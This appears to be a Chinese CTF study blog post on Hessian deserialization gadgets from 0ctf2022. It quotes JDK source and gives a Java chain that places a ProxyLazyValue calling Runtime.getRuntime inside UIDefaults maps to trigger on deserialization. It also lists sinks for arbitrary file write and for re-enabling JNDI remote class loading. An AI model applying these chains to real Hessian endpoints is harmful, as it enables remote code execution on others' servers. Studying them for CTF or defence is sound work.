<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/css/images/bg/favicon.ico">
  <link rel="icon" type="image/png" href="/css/images/bg/favicon.ico">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="摸鱼">
  <meta name="author" content="Aluvion">
  <meta name="keywords" content="">
  <title>Hessian JDK反序列化漏洞2 - Twings</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css" />

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link  rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css" />

<link  rel="stylesheet" href="/css/main.css" />


  <link defer rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />


<!-- 自定义样式保持在最底部 -->


<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Twings</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/css/images/bg/bg5.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期五, 二月 10日 2023, 9:23 晚上
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    1.1k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      5 分钟
                  </span>
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  <span id="busuanzi_container_page_pv" class="post-meta" style="display: none">
                    <i class="far fa-eye" aria-hidden="true"></i>
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
            <div class="markdown-body">
              <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>学习！0ctf2022 hessian-only-jdk相关危险操作点。</p>
<span id="more"></span>

<hr>
<h3 id="SwingLazyValue"><a href="#SwingLazyValue" class="headerlink" title="SwingLazyValue"></a>SwingLazyValue</h3><p>好像都要用到这个类，看看这是个什么东西。</p>
<p>一眼就能看到这个神奇函数：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> Object <span class="title function_">createValue</span><span class="params">(UIDefaults var1)</span> &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        ReflectUtil.checkPackageAccess(<span class="built_in">this</span>.className);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">var2</span> <span class="operator">=</span> Class.forName(<span class="built_in">this</span>.className, <span class="literal">true</span>, (ClassLoader)<span class="literal">null</span>);</span><br><span class="line">        Class[] var3;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">this</span>.methodName != <span class="literal">null</span>) &#123;</span><br><span class="line">            var3 = <span class="built_in">this</span>.getClassArray(<span class="built_in">this</span>.args);</span><br><span class="line">            <span class="type">Method</span> <span class="variable">var6</span> <span class="operator">=</span> var2.getMethod(<span class="built_in">this</span>.methodName, var3);</span><br><span class="line">            <span class="built_in">this</span>.makeAccessible(var6);</span><br><span class="line">            <span class="keyword">return</span> var6.invoke(var2, <span class="built_in">this</span>.args);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            var3 = <span class="built_in">this</span>.getClassArray(<span class="built_in">this</span>.args);</span><br><span class="line">            <span class="type">Constructor</span> <span class="variable">var4</span> <span class="operator">=</span> var2.getConstructor(var3);</span><br><span class="line">            <span class="built_in">this</span>.makeAccessible(var4);</span><br><span class="line">            <span class="keyword">return</span> var4.newInstance(<span class="built_in">this</span>.args);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (Exception var5) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>输入参数竟然毫无用处，createValue函数给出了两个选择：</p>
<ul>
<li><p>由于invoke主体为Class，所以只能用于调用一次参数可控的静态函数</p>
</li>
<li><p>或者调用一次参数可控的构造函数</p>
</li>
</ul>
<p>值得注意的一点是在通过Class.forName加载类时：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">var2</span> <span class="operator">=</span> Class.forName(<span class="built_in">this</span>.className, <span class="literal">true</span>, (ClassLoader)<span class="literal">null</span>);</span><br></pre></td></tr></table></figure>

<p>没有传入classloader，那么使用的应该是BootstrapClassLoader，而它只能加载rt.jar里面的类。</p>
<h3 id="ProxyLazyValue"><a href="#ProxyLazyValue" class="headerlink" title="ProxyLazyValue"></a>ProxyLazyValue</h3><p>SwingLazyValue继承自LazyValue接口，看看这个接口下的其他类，会发现ProxyLazyValue，其createValue函数也有类似的操作：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Class&lt;?&gt; c;</span><br><span class="line">Object cl;</span><br><span class="line"><span class="comment">// See if we should use a separate ClassLoader</span></span><br><span class="line"><span class="keyword">if</span> (table == <span class="literal">null</span> || !((cl = table.get(<span class="string">&quot;ClassLoader&quot;</span>))</span><br><span class="line">                        <span class="keyword">instanceof</span> ClassLoader)) &#123;</span><br><span class="line">    cl = Thread.currentThread().</span><br><span class="line">                getContextClassLoader();</span><br><span class="line">    <span class="keyword">if</span> (cl == <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="comment">// Fallback to the system class loader.</span></span><br><span class="line">        cl = ClassLoader.getSystemClassLoader();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">ReflectUtil.checkPackageAccess(className);</span><br><span class="line">c = Class.forName(className, <span class="literal">true</span>, (ClassLoader)cl);</span><br><span class="line">SwingUtilities2.checkAccess(c.getModifiers());</span><br><span class="line"><span class="keyword">if</span> (methodName != <span class="literal">null</span>) &#123;</span><br><span class="line">    Class[] types = getClassArray(args);</span><br><span class="line">    <span class="type">Method</span> <span class="variable">m</span> <span class="operator">=</span> c.getMethod(methodName, types);</span><br><span class="line">    <span class="keyword">return</span> MethodUtil.invoke(m, c, args);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    Class[] types = getClassArray(args);</span><br><span class="line">    <span class="type">Constructor</span> <span class="variable">constructor</span> <span class="operator">=</span> c.getConstructor(types);</span><br><span class="line">    SwingUtilities2.checkAccess(constructor.getModifiers());</span><br><span class="line">    <span class="keyword">return</span> constructor.newInstance(args);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，这里的同样可以调用静态函数和构造函数，不同的是这里加载类时的classloader不是null。</p>
<h3 id="LazyValue调用链"><a href="#LazyValue调用链" class="headerlink" title="LazyValue调用链"></a>LazyValue调用链</h3><p>UIDefaults类的getFromHashtable函数可以，UIDefaults虽然是Map类，但是其存在public的无参构造函数，并且本身是个public类，所以不会被hessian吃掉。</p>
<p>再往上是get函数，所以找一个Map.get就行了，比如HashTable的equals函数就可以。</p>
<p>简单构造一个HashMap包含两个UIDefaults就行：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Object</span> <span class="variable">proxyLazyValue</span> <span class="operator">=</span> Utils.createWithoutConstructor(<span class="string">&quot;javax.swing.UIDefaults$ProxyLazyValue&quot;</span>);</span><br><span class="line">Utils.setField(proxyLazyValue, <span class="string">&quot;className&quot;</span>, <span class="string">&quot;java.lang.Runtime&quot;</span>);</span><br><span class="line">Utils.setField(proxyLazyValue, <span class="string">&quot;methodName&quot;</span>, <span class="string">&quot;getRuntime&quot;</span>);</span><br><span class="line">Utils.setField(proxyLazyValue, <span class="string">&quot;args&quot;</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;&#125;);</span><br><span class="line"></span><br><span class="line"><span class="type">UIDefaults</span> <span class="variable">map1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UIDefaults</span>();</span><br><span class="line">map1.put(<span class="number">1</span>, proxyLazyValue);</span><br><span class="line"><span class="type">UIDefaults</span> <span class="variable">map2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UIDefaults</span>();</span><br><span class="line">map2.put(<span class="number">1</span>, proxyLazyValue);</span><br><span class="line"><span class="type">HashMap</span> <span class="variable">bigMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">bigMap.put(<span class="number">1</span>, <span class="number">1</span>);</span><br><span class="line">bigMap.put(<span class="number">2</span>, <span class="number">2</span>);</span><br><span class="line">Object[] table = (Object[])Utils.getFieldValue(bigMap, <span class="string">&quot;table&quot;</span>);</span><br><span class="line">Utils.setField(table[<span class="number">1</span>], <span class="string">&quot;key&quot;</span>, map1);</span><br><span class="line">Utils.setField(table[<span class="number">2</span>], <span class="string">&quot;key&quot;</span>, map2);</span><br><span class="line"></span><br><span class="line">unserialize(serialize(bigMap));</span><br></pre></td></tr></table></figure>

<p>根据参考文章，也可以走java.awt.datatransfer.MimeTypeParameterList进来：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">StringBuilder</span> <span class="variable">buffer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>(parameters.size() * <span class="number">16</span>);</span><br><span class="line"></span><br><span class="line">Enumeration&lt;String&gt; keys = parameters.keys();</span><br><span class="line"><span class="keyword">while</span>(keys.hasMoreElements())</span><br><span class="line">&#123;</span><br><span class="line">    buffer.append(<span class="string">&quot;; &quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">String</span> <span class="variable">key</span> <span class="operator">=</span> keys.nextElement();</span><br><span class="line">    buffer.append(key);</span><br><span class="line">    buffer.append(<span class="string">&#x27;=&#x27;</span>);</span><br><span class="line">        buffer.append(quote(parameters.get(key)));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> buffer.toString();</span><br></pre></td></tr></table></figure>

<p>最后用XString连上这里的toString就好了。</p>
<h3 id="sun-tools-jar-Main"><a href="#sun-tools-jar-Main" class="headerlink" title="sun.tools.jar.Main"></a>sun.tools.jar.Main</h3><p>获得静态函数调用最后就是就要找地方完成利用了，sun.tools.jar.Main.main：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] var0)</span> &#123;</span><br><span class="line">    <span class="type">Main</span> <span class="variable">var1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Main</span>(System.out, System.err, <span class="string">&quot;jar&quot;</span>);</span><br><span class="line">    System.exit(var1.run(var0) ? <span class="number">0</span> : <span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Main.run似乎可以写入jar文件：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Packer</span> <span class="variable">var11</span> <span class="operator">=</span> Pack200.newPacker();</span><br><span class="line"><span class="type">SortedMap</span> <span class="variable">var12</span> <span class="operator">=</span> var11.properties();</span><br><span class="line">var12.put(<span class="string">&quot;pack.effort&quot;</span>, <span class="string">&quot;1&quot;</span>);</span><br><span class="line">var8 = <span class="keyword">new</span> <span class="title class_">JarFile</span>(var5.getCanonicalPath());</span><br><span class="line">var9 = <span class="built_in">this</span>.createTemporaryFile(var7, <span class="string">&quot;.pack&quot;</span>);</span><br><span class="line">var4 = <span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(var9);</span><br><span class="line">var11.pack(var8, var4);</span><br><span class="line">var10 = <span class="keyword">new</span> <span class="title class_">JarOutputStream</span>(var6);</span><br><span class="line"><span class="type">Unpacker</span> <span class="variable">var13</span> <span class="operator">=</span> Pack200.newUnpacker();</span><br><span class="line">var13.unpack(var9, var10);</span><br></pre></td></tr></table></figure>

<p>但是内容不可控。</p>
<p>其他代码块里，有文件写入、文件解压的功能：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">var47 = <span class="built_in">this</span>.fname == <span class="literal">null</span> ? <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(FileDescriptor.in) : <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="built_in">this</span>.fname);</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="built_in">this</span>.extract((InputStream)(<span class="keyword">new</span> <span class="title class_">BufferedInputStream</span>(var47)), <span class="built_in">this</span>.files);</span><br><span class="line">&#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">    var47.close();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是源是另一个文件，所以这个函数使用条件比较苛刻。</p>
<h3 id="com-sun-org-apache-xalan-internal-xslt-main"><a href="#com-sun-org-apache-xalan-internal-xslt-main" class="headerlink" title="com.sun.org.apache.xalan.internal.xslt._main"></a>com.sun.org.apache.xalan.internal.xslt._main</h3><p>看起来可以跟TemplatesImpl联动：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Source</span> <span class="variable">source</span> <span class="operator">=</span> stf.getAssociatedStylesheet(<span class="keyword">new</span> <span class="title class_">StreamSource</span>(inFileName), media, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="literal">null</span> != source)</span><br><span class="line">    stylesheet = tfactory.newTemplates(source);</span><br></pre></td></tr></table></figure>

<p>但是输入也是文件。</p>
<h3 id="System-setProperty"><a href="#System-setProperty" class="headerlink" title="System.setProperty"></a>System.setProperty</h3><p>可以修改属性：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">setProperty</span><span class="params">(String key, String value)</span> &#123;</span><br><span class="line">    checkKey(key);</span><br><span class="line">    <span class="type">SecurityManager</span> <span class="variable">sm</span> <span class="operator">=</span> getSecurityManager();</span><br><span class="line">    <span class="keyword">if</span> (sm != <span class="literal">null</span>) &#123;</span><br><span class="line">        sm.checkPermission(<span class="keyword">new</span> <span class="title class_">PropertyPermission</span>(key,</span><br><span class="line">            SecurityConstants.PROPERTY_WRITE_ACTION));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> (String) props.setProperty(key, value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>比如高版本限制JNDI注入的就是com.sun.jndi.rmi.object.trustURLCodebase、java.rmi.server.useCodebaseOnly等系统属性，修改这些属性可以加载远程对象。</p>
<h3 id="System-setProperty-InitialContext-doLookup"><a href="#System-setProperty-InitialContext-doLookup" class="headerlink" title="System.setProperty + InitialContext.doLookup"></a>System.setProperty + InitialContext.doLookup</h3><p>可以触发JNDI注入加载远程对象。</p>
<h3 id="com-sun-org-apache-xml-internal-security-utils-JavaUtils"><a href="#com-sun-org-apache-xml-internal-security-utils-JavaUtils" class="headerlink" title="com.sun.org.apache.xml.internal.security.utils.JavaUtils"></a>com.sun.org.apache.xml.internal.security.utils.JavaUtils</h3><p>writeBytesToFilename静态函数：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">writeBytesToFilename</span><span class="params">(String filename, <span class="type">byte</span>[] bytes)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (filename != <span class="literal">null</span> &amp;&amp; bytes != <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> (<span class="type">OutputStream</span> <span class="variable">outputStream</span> <span class="operator">=</span> Files.newOutputStream(Paths.get(filename))) &#123;</span><br><span class="line">            outputStream.write(bytes);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException ex) &#123;</span><br><span class="line">            LOG.debug(ex.getMessage(), ex);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        LOG.debug(<span class="string">&quot;writeBytesToFilename got null byte[] pointed&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="可以完全控制内容地写入一个文件，简直无敌。"><a href="#可以完全控制内容地写入一个文件，简直无敌。" class="headerlink" title="可以完全控制内容地写入一个文件，简直无敌。"></a>可以完全控制内容地写入一个文件，简直无敌。</h2><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3>
            </div>
            <hr>
            <div>
              <p>
                
                
                  <span>
                <i class="iconfont icon-tag"></i>
                    
                      <a class="hover-with-bg" href="/tags/Web/">Web</a>
                    
                      <a class="hover-with-bg" href="/tags/Java/">Java</a>
                    
                      <a class="hover-with-bg" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a>
                    
                  </span>
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-12 col-md-6">
                    
                      <a href="/2023/02/12/Hessian-JDK%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E3/">
                        <i class="fa fa-chevron-left"></i>
                        <span>Hessian JDK反序列化漏洞3</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-12 col-md-6">
                    
                      <a href="/2023/02/09/Hessian-JDK%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">
                        <span>Hessian JDK反序列化漏洞</span>
                        <i class="fa fa-chevron-right"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

              
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var toc = $('#toc');
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;
      var tocLimMax = 2 * boardTop + boardCtn.height();

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = boardCtn.css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>







  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Hessian JDK反序列化漏洞2&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script defer src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
